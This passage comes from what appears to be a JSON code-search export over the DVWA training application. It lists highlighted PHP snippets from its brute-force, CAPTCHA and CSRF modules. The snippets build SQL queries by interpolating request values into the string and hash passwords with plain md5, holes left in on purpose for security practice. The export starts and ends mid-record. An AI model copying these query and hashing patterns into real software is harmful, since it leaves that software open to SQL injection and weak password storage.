<span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">mysqli_num_rows</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">16:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get users details\n<span class=\"line-number\">17:</span> \t\t<span class=\"token variable\">$row</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_fetch_assoc</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 85,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/medium.php",
"filetype": "php",
"search": "`",
"match": "<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">mysqli_num_rows</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get users details\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$row</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_fetch_assoc</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$result</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 99,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
"filetype": "php",
"search": "`",
"match": "<span class=\"line-number\">26:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">27:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"highlight\"><span class=\"line-number\">31:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"' LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">32:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \n<span class=\"line-number\">34:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> user\n<span class=\"line-number\">35:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">36:</span> \t\t}",
"line": 31,
"start": 26,
"end": 37,
"severity": "unknown",
"note": ""
},
{
"id": 124,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
"filetype": "php",
"search": "`",
"match": "<span class=\"line-number\">55:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">57:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">58:</span> \n<span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"highlight\"><span class=\"line-number\">60:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">62:</span> \n<span class=\"line-number\">63:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">64:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">65:</span> \t}",
"line": 60,
"start": 55,
"end": 66,
"severity": "unknown",
"note": ""
},
{
"id": 136,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "`",
"match": "<span class=\"line-number\">63:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">64:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">65:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">66:</span> \n<span class=\"line-number\">67:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"highlight\"><span class=\"line-number\">68:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">69:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">70:</span> \n<span class=\"line-number\">71:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">72:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Password Changed.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">73:</span> \t}",
"line": 68,
"start": 63,
"end": 74,
"severity": "unknown",
"note": ""
},
{
"id": 147,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
"filetype": "php",
"search": "`",
"match": "<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span></span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span 